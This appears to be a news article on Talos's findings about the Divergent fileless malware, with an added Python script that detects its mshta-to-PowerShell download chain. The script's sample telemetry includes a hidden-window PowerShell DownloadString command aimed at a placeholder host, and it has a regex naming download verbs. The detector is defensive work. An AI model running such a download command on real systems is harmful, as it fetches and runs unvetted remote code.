Divergent achieves its malicious goals by using existing programs, both those already present in Windows and others downloaded from third parties.
"This threat uses NodeJS — a program that executes JavaScript outside of a web browser — as well as the legitimate open-source utility WinDivert to facilitate some of the functionality in the Divergent malware," said Talos.
Talos added that the use of NodeJS is not something commonly seen across malware families, which makes Divergent an interesting development.
However, it shares many similarities with other popular fileless malware families, including Kovter.
How it works
"When first delivered and executed on a victim's machine, the malware is in the portable executable (PE) format. Its first task, however, is to install itself to the system in a less suspicious form, namely as an HTML Application (HTA) that will load the malware from the registry," said Talos.
Once installed, a series of events occur:
The initial JavaScript file downloads a second JavaScript file.
This second JavaScript file runs a PowerShell command that downloads several malicious tools.
These tools can disable Windows Defender, gain more control of the PC, and create a proxy.
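The chain above (an HTA host whose descendants run a PowerShell download stage, with NodeJS appearing where malware rarely uses it) lends itself to a lineage-based detection. The following is an added example, not Talos's analysis code or part of the article; it assumes the HTA runs under mshta.exe and that the download stage uses common PowerShell download verbs, and the process telemetry is constructed inline.

```python
"""Flag process lineages matching the Divergent-style chain described above:
mshta.exe (HTA host) with a descendant PowerShell downloader or node.exe."""
import re
from dataclasses import dataclass

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # executable file name, lower-cased
    cmdline: str

# Assumption: download stages use one of these common PowerShell/.NET download verbs.
DOWNLOAD_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|start-bitstransfer",
                         re.IGNORECASE)
MAX_HOPS = 4    # how far up the tree to look for the HTA ancestor

def ancestry(events, pid):
    """Return the image names from pid up to the root (or until the tree breaks)."""
    by_pid = {e.pid: e for e in events}
    chain = []
    while pid in by_pid and len(chain) < 16:
        chain.append(by_pid[pid].image)
        pid = by_pid[pid].ppid
    return chain

def find_divergent_like(events):
    """Return (pid, reason) pairs for events fitting the HTA -> download / node.exe chain."""
    hits = []
    for e in events:
        parents = ancestry(events, e.ppid)[:MAX_HOPS]
        if "mshta.exe" not in parents:
            continue                      # no HTA host in the recent lineage
        if e.image == "powershell.exe" and DOWNLOAD_RE.search(e.cmdline):
            hits.append((e.pid, "PowerShell downloader spawned under mshta.exe"))
        elif e.image == "node.exe":
            hits.append((e.pid, "node.exe spawned under mshta.exe"))
    return hits

# Constructed sample telemetry: one Divergent-like lineage beside benign admin activity.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, "explorer.exe", "explorer.exe"),
    ProcEvent(200, 100, "mshta.exe", r'mshta.exe "C:\Users\u\AppData\Roaming\loader.hta"'),
    ProcEvent(300, 200, "wscript.exe", r"wscript.exe //e:jscript C:\Users\u\AppData\Roaming\stage2.js"),
    ProcEvent(400, 300, "powershell.exe",
              "powershell.exe -w hidden -c \"(New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')\""),
    ProcEvent(500, 400, "node.exe", r"node.exe C:\Users\u\AppData\Roaming\proxy.js"),
    ProcEvent(600, 100, "powershell.exe", "powershell.exe Invoke-WebRequest https://updates.example/patch"),
]
```

Only the two events whose lineage passes through mshta.exe are flagged; the benign PowerShell download under explorer.exe is not.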
Talos believes that the malware was designed for typical cybercrime rather than for government-sanctioned attacks.
It added that Divergent was probably designed to be used predominantly for click fraud, using the computers of everyday European and US consumers to increase ad revenue.